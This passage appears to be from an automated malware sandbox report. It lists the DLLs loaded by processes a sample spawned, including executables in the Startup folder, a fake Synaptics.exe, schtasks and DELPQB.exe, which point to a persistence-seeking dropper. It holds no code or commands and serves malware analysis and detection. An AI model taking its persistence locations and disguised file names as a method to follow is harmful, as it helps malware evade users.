                              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: acgenral.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: shacct.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: idstore.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wlidprov.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: provsvc.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: acgenral.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: acgenral.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dwmapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: acgenral.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmm.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: samcli.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msacm32.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dwmapi.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winmmbase.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: aclayers.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc.dll
                              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: apphelp.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeSection loaded: userenv.dll
